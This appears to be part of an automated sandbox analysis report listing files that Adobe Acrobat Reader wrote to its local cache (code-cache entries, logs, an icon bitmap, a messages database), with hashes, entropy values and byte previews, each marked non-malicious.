                                                                  SSDEEP:3:m+lxCq//6v8RzYOCGLvHkWBGKuKCH6U4LJzWHK7WFvp9w4kGoMktR1lXpSKGoSSh:msRPYOFLvEWIa7zp7l4doltp8VPu1
                                                                  MD5:AE238654E64E4EB678B2BB9362E2C278
                                                                  SHA1:4F3E5304F7C93EA56793CF0E4E9A6CB95281EBCC
                                                                  SHA-256:81CAE30BCCF80B7950B7030B13EFE5AB6B6361E25F09F3438635B994C3B480A6
                                                                  SHA-512:D09B322D51B81194E78BD002D1CE7CCBD49EEBC377338AE25A17D649B7B514AFE91F8D7AA38D6BB8DB6863EC0E782152B9E18BB1B65572C82745C6723322095F
                                                                  Malicious:false
                                                                  Preview:0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js ...,..[/....."#.D.0.;..A.A..Eo......6.............L...Im.@.........E.nW...IP..A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf0ac66ae1eb4a7f_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):208
                                                                  Entropy (8bit):5.6089996285579256
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lQi9lC8RzYOCGLvHkWBGKuKjXKVRNUpXKLuVTDeThMkt+9l/ll96F4XVAZ+8cW:mKPYOFLvEWdENU9QsYltm/l6wiM3Y1
                                                                  MD5:17A91081BA76BDDD6E30DE6A6D3AC94A
                                                                  SHA1:1AC5F7338E0A7F9C37FD084175C0E80DC779F152
                                                                  SHA-256:D448E3084E26DCBAF44E02F9919507A63776C9F8B972BFD1D62A478901BABB0C
                                                                  SHA-512:095BFD917CAFCFC21EF7E6109DF00AE813E6F7E6C144653C221B3610DA4B71C641A74C09FFDC919A921BA329B351D86C86BC2C91CCD441F6CF32829B45B5B1C7
                                                                  Malicious:false
                                                                  Preview:0\r..m......P...Yft....._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/plugin.js ..r?..[/....."#.D..(.;..A.A..Eo.....................M....m+lS..e.....<7.U.P8*.0K.A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):208
                                                                  Entropy (8bit):5.652251851742299
                                                                  Encrypted:false
                                                                  SSDEEP:6:mQt6EYOFLvEWdccAHQ4qltc/mjBRCh/41:XRc91Q6mDi/
                                                                  MD5:C98AC9F0CC548C67C7CEF5EC0824B65A
                                                                  SHA1:B5017F75318BB42AFC3B4C5C2B8D0CB287C056D5
                                                                  SHA-256:AFA3B6633AD67A7E00EF94F56F2604094E8AC48214F1D2A9561C46B83BF1EE0A
                                                                  SHA-512:8A5EA32B426525B1A5942684B56111CE51FFAF43E3519855AD6686E760C664B86F1DB8032922A4AFC86B35A90B940311D0D20256D25022B6DFC833518EE56811
                                                                  Malicious:false
                                                                  Preview:0\r..m......P...W3......_keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/plugin.js ..*D..[/....."#.D..K.;..A.A..Eo.................PJm...0x.x..RD...BB!@5..<..]....A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d449e58cb15daaf1_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):231
                                                                  Entropy (8bit):5.622215816202665
                                                                  Encrypted:false
                                                                  SSDEEP:6:mqs6XYOFLvEWdFCi5mhu7V4doltwkULlF4r1:bs6xRkibe7LlF4
                                                                  MD5:4FD9A235C943871C802ED1F69AFFB0DE
                                                                  SHA1:0CADB8E1BD56A29E6FF44E4A107C9DEA76521097
                                                                  SHA-256:5FC0C8E68198DFAA39454DA313F945FEB97CB73D1D658EBFC06E23910310AC82
                                                                  SHA-512:B0BD7391513BFD3981D6E1BC7B84DF1831F7C6F110AC4B4DD9D62820FDCDABFE4379BDF81B51D8EC3F3CBA6807D90CEE4158716E73FD869C75573CE55C50F117
                                                                  Malicious:false
                                                                  Preview:0\r..m......g...~.I?...._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-selector.js ......[/....."#.D..).;..A.A..Eo......>............P...#4..l....5...5..).w.. .h.~..A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d88192ac53852604_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):215
                                                                  Entropy (8bit):5.556584574932782
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lPHYs8RzYOCGLvHkWBGKuKjXKXqjuSKPWFvxhsPxMkt4tlXECcu1isLK5m1:mhYOFLvEWd/aFuts5ltCEN941
                                                                  MD5:DCB607CFB27555D7F4BEFFBC96CEDF27
                                                                  SHA1:30562A351B7FF36ED81FF5B66664C7DC31C0078D
                                                                  SHA-256:F761A90DA84E0CBE1E8A679E52B8B6246AA074AB81C7CA7C275F1B13A33D1D14
                                                                  SHA-512:B4DC642427A8FB8AE97649D961AC9C62C593BE40124F7A76A4CA02F5FADF53782AC5113E7045D52B8898B5181B59474D85C17B5E75A09CDD182E61482133012B
                                                                  Malicious:false
                                                                  Preview:0\r..m......W....w.m...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-recent-files/js/selector.js ...D..[/....."#.D{.<.;..A.A..Eo.......+.............a.f.m.i.o.p..3U5.....^...I.A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\de789e80edd740d6_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):208
                                                                  Entropy (8bit):5.563022573534015
                                                                  Encrypted:false
                                                                  SSDEEP:6:mR9YOFLvEWd7VIGXOdQ3o+xltA/dBMqVd3G4K41:2DRuRqedB9Vd2
                                                                  MD5:5211A56708D44D6483FFC46465D11682
                                                                  SHA1:71B38B7666FCF2D52857D3189955F7AF56C57993
                                                                  SHA-256:632C068F0B720A4418B783919AEFBEDA0CE4FCD5A561BFC81A0555CBA3192499
                                                                  SHA-512:97520B0EB28363CCDC292ECEC5FC387701955052A1DCBF7B387B37E119932C5FF60C54CC7AA6B2F1931D381FF27E5EC2BCA9F160BB22344B0A98BB7B366A50B0
                                                                  Malicious:false
                                                                  Preview:0\r..m......P...y.p....._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/plugin.js ...D..[/....."#.Dq.=.;..A.A..Eo......,..=..........y.$..$.v5j...T...z.]..._S....A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):208
                                                                  Entropy (8bit):5.593162938014159
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lQyu6OA8RzYOCGLvHkWBGKuKjXK9QXAdWKjKLuV1s/SN3hMktHtpW4ThzJuA4N:mkqYOFLvEWd8CAd9Q4NxltNDuA424r1
                                                                  MD5:C2E446B84162D7C612F465C27D0775AA
                                                                  SHA1:224E393442EFB1365F1967BFD23C77B6848300D8
                                                                  SHA-256:57B16249E7499106C37DFAD97C8FFF5FB31FD54DAD8A3FC2C71CB2A2303D20F5
                                                                  SHA-512:218A68AF6A3FCD0EB2C14E3E618743B9A9FDFF4271F3724C1F9F7C7490B246CF773149E1C2A827F2F05D196BF63F65753910C8507F5022AA206CC0E650DD9C1D
                                                                  Malicious:false
                                                                  Preview:0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js ...D..[/....."#.D.zL.;..A.A..Eo......cc.U........#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f4a0d4ca2f3b95da_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):210
                                                                  Entropy (8bit):5.587523436931564
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lS5Etla8RzYOCGLvHkWBGKuKjXKVRNUp/KPWFv0t1we7xMktAo9Ag2iHio/Mm1:moXXYOFLvEWdENUAuk1ZltIyC8n1
                                                                  MD5:FEA5D76374E6A4DE5B5AC610BD205119
                                                                  SHA1:CC4AF70747FA08A50B9E4EEAA52BD5D8E95F6256
                                                                  SHA-256:1A838062AA62C8347E0CCF1B6A0561518A530E024BB80AF5C3D9EC5F315EEBC5
                                                                  SHA-512:27D2F2CCBE1F79211D2327F9FF65531CF907C14D0021CD09406008B571A049037924D87023CBFD299B47C220334699B6FB2246DF744BBE27BDEBD492E627D00D
                                                                  Malicious:false
                                                                  Preview:0\r..m......R..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/selector.js ...?..[/....."#.D$.#.;..A.A..Eo......FY^.........8.../...;.\\o....1..........+..A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):221
                                                                  Entropy (8bit):5.6144531174906875
                                                                  Encrypted:false
                                                                  SSDEEP:6:mQZYOFLvEWdrROk/VQ9JvHT/ltCsLmB41:nRrROk/VKvHT90N
                                                                  MD5:610F33B99FA942A727DA998E661CEB81
                                                                  SHA1:F6447210842D4FD08EA34B445D6141A9AE3A36EF
                                                                  SHA-256:051F0E0D79C868A3E077B1AD516013C73F4BF13A0053AF773A63D294BA7B41A3
                                                                  SHA-512:3BA0EC9AB0BB3A53DB51DF194BE039B0C1E8AD9A304AE298F8013F3A7EB2AED9E6D47BE3A0E769CC14A5137114FC279F24A33658126A8A9C90E8D6FF69CCBE4B
                                                                  Malicious:false
                                                                  Preview:0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js ...<..[/....."#.D-...;..A.A..Eo......~.@......... ./.ev......N~..6.b.....$.j;:C...A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):210
                                                                  Entropy (8bit):5.591277206853126
                                                                  Encrypted:false
                                                                  SSDEEP:6:mZ/lXYOFLvEWdccAWurCJ+RylttJdm9741:qxRcplRYJdu7
                                                                  MD5:B457703FB68D6CFFE4C92B43ED536F52
                                                                  SHA1:103A24A957CA7C2816F588AA77DA12D59E0686A0
                                                                  SHA-256:F395E5B384CB65923CAC3E9063BD97487A58F7098C06BE28723A3F4FB94DB6F6
                                                                  SHA-512:96BB77253D26BBC82EFA22B6A4F28483349186536239D3D0C9D9DB921A91BC2131AF9F4E56540D725EA090B48A75DC7FE2676A74EE3DF8F56E49EE828E0933B6
                                                                  Malicious:false
                                                                  Preview:0\r..m......R...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/selector.js ...B..[/....."#.D.;.;..A.A..Eo.......q;............U...I.>P...X...x..0U.~;m.x.k.A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):204
                                                                  Entropy (8bit):5.5652295909256475
                                                                  Encrypted:false
                                                                  SSDEEP:3:m+lUg18RzYOCGLvHkWBGKuKjXKrAUWiKPWFv2nttJp/MktZItOB6shoq+Nem1:mMOYOFLvEWdwAPVuEN1ltZtB6Jn1
                                                                  MD5:C32AD09263EC4F2975DBA20EF465A8BB
                                                                  SHA1:C794A1584A8F65E886568DF0DBFAF342C5061AC4
                                                                  SHA-256:013439883D049E2D73DADB9998839EA5C7634872DC094F17B87D05F996AF2AA6
                                                                  SHA-512:2411C46D5F95FE4E419FFE1F270A2F2EDA3DD6A002F1DD46BD1CC7B7DA0983CF748FFC14641EEC03565687C0A6CAED8480511B501B51B35D6DD490738F3C1342
                                                                  Malicious:false
                                                                  Preview:0\r..m......L....Ey....._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/selector.js .r.?..[/....."#.D..#.;..A.A..Eo.......................k....F..D..O.n;[.1m.....=..A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fdd733564de6fbcb_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):212
                                                                  Entropy (8bit):5.638052765412066
                                                                  Encrypted:false
                                                                  SSDEEP:6:m3PXYOFLvEWdBJvYQ9J+Kge7xltvWXqhcsBXIh1:mxRBJQS+KrlWKB
                                                                  MD5:759EBABE109F8811478E7F2A1F5A46CA
                                                                  SHA1:E7BB3ECBA838673F1D22DCEFF4E07B13686A776D
                                                                  SHA-256:E4A89FFF1F9B601275CBA3465DD6E4AAA105FA6CB6F9D4DE5A1E36101FDE6C17
                                                                  SHA-512:FCB68AA4F2DDD13449C117042A073FB0E347F2208DD345C5702E55611E63BAF26F964BE8423CC6BDF94B9CB4F12644D60FF6C8128884BE87A0F50B0F4F9CE412
                                                                  Malicious:false
                                                                  Preview:0\r..m......T......z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/plugin.js ..ND..[/....."#.D..=.;..A.A..Eo......^Nf............k..`..N3.... ..d..$[.....{.A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):228
                                                                  Entropy (8bit):5.5751688669733745
                                                                  Encrypted:false
                                                                  SSDEEP:6:msPYOFLvEWdrROk/RJUQNYW/p/ltBzc3Me/1:3RrROk/s2YY9r
                                                                  MD5:97564D77C5111674916FC2D74FB4F80F
                                                                  SHA1:C778B304CE4BA25D4139AFBD39ED41A1555A5ABF
                                                                  SHA-256:E985ADCDB86CDA6D3D757FD5E121758E213C74056B40D36E60C5EDA143790025
                                                                  SHA-512:97FBF01D7EBA9437886667546488A9459A7207B0FCB8B9C0D1A731BF7E27D52111FBE5935E4F73F785BAD831E4FCADFB8122BDBAD2573B8D119438AA72B9516C
                                                                  Malicious:false
                                                                  Preview:0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ...<..[/....."#.D.3..;..A.A..Eo........O..............9Q].8O.z....=..:.N.{....N{.A..Eo..................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\temp-index

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1032
                                                                  Entropy (8bit):5.0316523537584565
                                                                  Encrypted:false
                                                                  SSDEEP:12:WSZsyJXboCu5tfL77Vi3SSqMzlfvUGU2Ki9Guc0IRUAvS2McxTl9m:DsSHkBBDMSU3IxNMaLm
                                                                  MD5:3402615A2FE4D0B9591D9B049F5FA137
                                                                  SHA1:C2423F586F13807865D436A4747CA4CF4C97C4F0
                                                                  SHA-256:CDF5A0C7BB521349FDA3F36CFC57C9DF99E5B3B22B64A5BBF7EC81E28E31636A
                                                                  SHA-512:C1E331C88B219EE37F293CB1FA139CEA77F36D3F0AAD98B148A4D125BE47FDDF7D2B7B1EF86780FD8F66EA70D762D0D7884C01958207F53C5D1DD214CC0A41EE
                                                                  Malicious:false
                                                                  Preview:.......oy retne....)........R............*...57..[/...........;.y~A..57..[/..............oB*..'..[/............#...(@...................D.4.@wF..[/..........[.i..%..57..[/.............k7A..57..[/..........]...I..,...[/.........,+..._.#.57..[/.........<...W..J..'..[/..........J..j....57..[/...........6<|.....'..[/...........2q.....57..[/...........P....V.57..[/.........!...0.o.57..[/............P[. q.57..[/...........3....57..[/..........v...q....'..[/...........a......'..[/..........C..M..@......................@n...[/.........F..=z;..57..[/.............o..57..[/.........Gy.'.h..57..[/.........:..N.A...57..[/..........;/....57..[/.................57..[/.........A?.2:...57..[/..............q..57..[/..........u\]..q.57..[/.........*)....J:.57..[/..........&.S.....57..[/..........o..k...57..[/...........*.....57..[/.........^.~..z..57..[/..........+.{..'.57..[/..........@..x..57..[/............MV3...57..[/.........+.U.!..V@wF..[/..........~.,.4>.@wF..[/.........

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index (copy)

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1032
                                                                  Entropy (8bit):5.0316523537584565
                                                                  Encrypted:false
                                                                  SSDEEP:12:WSZsyJXboCu5tfL77Vi3SSqMzlfvUGU2Ki9Guc0IRUAvS2McxTl9m:DsSHkBBDMSU3IxNMaLm
                                                                  MD5:3402615A2FE4D0B9591D9B049F5FA137
                                                                  SHA1:C2423F586F13807865D436A4747CA4CF4C97C4F0
                                                                  SHA-256:CDF5A0C7BB521349FDA3F36CFC57C9DF99E5B3B22B64A5BBF7EC81E28E31636A
                                                                  SHA-512:C1E331C88B219EE37F293CB1FA139CEA77F36D3F0AAD98B148A4D125BE47FDDF7D2B7B1EF86780FD8F66EA70D762D0D7884C01958207F53C5D1DD214CC0A41EE
                                                                  Malicious:false
                                                                  Preview:.......oy retne....)........R............*...57..[/...........;.y~A..57..[/..............oB*..'..[/............#...(@...................D.4.@wF..[/..........[.i..%..57..[/.............k7A..57..[/..........]...I..,...[/.........,+..._.#.57..[/.........<...W..J..'..[/..........J..j....57..[/...........6<|.....'..[/...........2q.....57..[/...........P....V.57..[/.........!...0.o.57..[/............P[. q.57..[/...........3....57..[/..........v...q....'..[/...........a......'..[/..........C..M..@......................@n...[/.........F..=z;..57..[/.............o..57..[/.........Gy.'.h..57..[/.........:..N.A...57..[/..........;/....57..[/.................57..[/.........A?.2:...57..[/..............q..57..[/..........u\]..q.57..[/.........*)....J:.57..[/..........&.S.....57..[/..........o..k...57..[/...........*.....57..[/.........^.~..z..57..[/..........+.{..'.57..[/..........@..x..57..[/............MV3...57..[/.........+.U.!..V@wF..[/..........~.,.4>.@wF..[/.........

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index~RF5b0b40.TMP (copy)

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1032
                                                                  Entropy (8bit):5.0316523537584565
                                                                  Encrypted:false
                                                                  SSDEEP:12:WSZsyJXboCu5tfL77Vi3SSqMzlfvUGU2Ki9Guc0IRUAvS2McxTl9m:DsSHkBBDMSU3IxNMaLm
                                                                  MD5:3402615A2FE4D0B9591D9B049F5FA137
                                                                  SHA1:C2423F586F13807865D436A4747CA4CF4C97C4F0
                                                                  SHA-256:CDF5A0C7BB521349FDA3F36CFC57C9DF99E5B3B22B64A5BBF7EC81E28E31636A
                                                                  SHA-512:C1E331C88B219EE37F293CB1FA139CEA77F36D3F0AAD98B148A4D125BE47FDDF7D2B7B1EF86780FD8F66EA70D762D0D7884C01958207F53C5D1DD214CC0A41EE
                                                                  Malicious:false
                                                                  Preview:.......oy retne....)........R............*...57..[/...........;.y~A..57..[/..............oB*..'..[/............#...(@...................D.4.@wF..[/..........[.i..%..57..[/.............k7A..57..[/..........]...I..,...[/.........,+..._.#.57..[/.........<...W..J..'..[/..........J..j....57..[/...........6<|.....'..[/...........2q.....57..[/...........P....V.57..[/.........!...0.o.57..[/............P[. q.57..[/...........3....57..[/..........v...q....'..[/...........a......'..[/..........C..M..@......................@n...[/.........F..=z;..57..[/.............o..57..[/.........Gy.'.h..57..[/.........:..N.A...57..[/..........;/....57..[/.................57..[/.........A?.2:...57..[/..............q..57..[/..........u\]..q.57..[/.........*)....J:.57..[/..........&.S.....57..[/..........o..k...57..[/...........*.....57..[/.........^.~..z..57..[/..........+.{..'.57..[/..........@..x..57..[/............MV3...57..[/.........+.U.!..V@wF..[/..........~.,.4>.@wF..[/.........

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):298
                                                                  Entropy (8bit):5.192642087459904
                                                                  Encrypted:false
                                                                  SSDEEP:6:k7Ooyq2PN72nKuAl9OmbnIFUtIO11ZmwuOkBTRkwON72nKuAl9OmbjLJ:kSvVaHAahFUtT1/O5OaHAaSJ
                                                                  MD5:E5CBB40936996C3DF2D13B63006733B7
                                                                  SHA1:EFCEA00ACFF1686964AE72983D3EF11CE68255DF
                                                                  SHA-256:3B4A436E5A4FB07854A696CA3ED951918ED2FD0EFDC509A3A4FFBDF6F645C8B6
                                                                  SHA-512:40A8FA50EE967C6B63CC476194257003AC88136DF4CEB2CE4BA9BF0923AA4834EDD27516689D96ACBB98A3E905738106769C811C2FE60B5F7050B81F497DE0E6
                                                                  Malicious:false
                                                                  Preview:2023/06/01-12:14:55.038 19e4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/06/01-12:14:55.053 19e4 Recovering log #3.2023/06/01-12:14:55.065 19e4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):298
                                                                  Entropy (8bit):5.192642087459904
                                                                  Encrypted:false
                                                                  SSDEEP:6:k7Ooyq2PN72nKuAl9OmbnIFUtIO11ZmwuOkBTRkwON72nKuAl9OmbjLJ:kSvVaHAahFUtT1/O5OaHAaSJ
                                                                  MD5:E5CBB40936996C3DF2D13B63006733B7
                                                                  SHA1:EFCEA00ACFF1686964AE72983D3EF11CE68255DF
                                                                  SHA-256:3B4A436E5A4FB07854A696CA3ED951918ED2FD0EFDC509A3A4FFBDF6F645C8B6
                                                                  SHA-512:40A8FA50EE967C6B63CC476194257003AC88136DF4CEB2CE4BA9BF0923AA4834EDD27516689D96ACBB98A3E905738106769C811C2FE60B5F7050B81F497DE0E6
                                                                  Malicious:false
                                                                  Preview:2023/06/01-12:14:55.038 19e4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/06/01-12:14:55.053 19e4 Recovering log #3.2023/06/01-12:14:55.065 19e4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF5aa4d5.TMP (copy)

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):298
                                                                  Entropy (8bit):5.192642087459904
                                                                  Encrypted:false
                                                                  SSDEEP:6:k7Ooyq2PN72nKuAl9OmbnIFUtIO11ZmwuOkBTRkwON72nKuAl9OmbjLJ:kSvVaHAahFUtT1/O5OaHAaSJ
                                                                  MD5:E5CBB40936996C3DF2D13B63006733B7
                                                                  SHA1:EFCEA00ACFF1686964AE72983D3EF11CE68255DF
                                                                  SHA-256:3B4A436E5A4FB07854A696CA3ED951918ED2FD0EFDC509A3A4FFBDF6F645C8B6
                                                                  SHA-512:40A8FA50EE967C6B63CC476194257003AC88136DF4CEB2CE4BA9BF0923AA4834EDD27516689D96ACBB98A3E905738106769C811C2FE60B5F7050B81F497DE0E6
                                                                  Malicious:false
                                                                  Preview:2023/06/01-12:14:55.038 19e4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/06/01-12:14:55.053 19e4 Recovering log #3.2023/06/01-12:14:55.065 19e4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):131072
                                                                  Entropy (8bit):0.008751778056341745
                                                                  Encrypted:false
                                                                  SSDEEP:3:ImtV6FSn/eElwllx3nOtWGY4/l/0yaQgpn:IiV6EnWMwlr1AtMyaQSn
                                                                  MD5:3CDF4DD67B462B6603FAE426952965A5
                                                                  SHA1:172F1BCAA40DF4ACB182DB1DB5B72D15C5AB677E
                                                                  SHA-256:B317BB26B68B5695447E8131700CC2D2A5389DB38FF3FFBD50BA10475965527B
                                                                  SHA-512:9EFBDE44641F1C71724A72E42B8343076DAEBCFDE1204F1EB2F4FF8FA7931DB340686B527367EE114C99E07D0D3D3FCC7FBFFD2E8E60DE40EE816A05B8C005C3
                                                                  Malicious:false
                                                                  Preview:VLnk.....?........`.N.7................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-230601191443Z-273.bmp

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                  File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                  Category:dropped
                                                                  Size (bytes):65110
                                                                  Entropy (8bit):0.6442903166717108
                                                                  Encrypted:false
                                                                  SSDEEP:96:6JiNp29ECmTTT8dePc4lDe/quy47rHMMMT8:CyCaT8UgB3
                                                                  MD5:E0E44159B1CE64E3FBCA349002312A5A
                                                                  SHA1:3E2C1142527A78285FCBE981250E07A6FB5C94E5
                                                                  SHA-256:850CACAE25D1D93F40679BF94F801027CDB3DFDACA2CDFFBA2836EE0B19DCE44
                                                                  SHA-512:EFC5A54E1A000DD4D38AC95EFA76412A2B4EF7E94A7B4C6AC20A8656551756D3D05A0323BB29CAC47008D71024300468B9B2A735CA16A23EC6DF1CEEC856E487
                                                                  Malicious:false
                                                                  Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3024000, file counter 12, database pages 15, cookie 0x5, schema 4, UTF-8, version-valid-for 12
                                                                  Category:dropped
                                                                  Size (bytes):61440
                                                                  Entropy (8bit):3.5646043034277866
                                                                  Encrypted:false
                                                                  SSDEEP:384:3e59dThntELJ8fwRRwZsLRGlKhsvXh+vSc:qkYZsLQhUSc
                                                                  MD5:6872CF6EA9AE09D7906E273DB5E79AD6
                                                                  SHA1:DC7703B003D86C099A503DA2BDAE3247BF88189C
                                                                  SHA-256:DB931A0B93105B0B7F341F64BA63E90CF06913F32D01CAA9DA329366D66E62C7
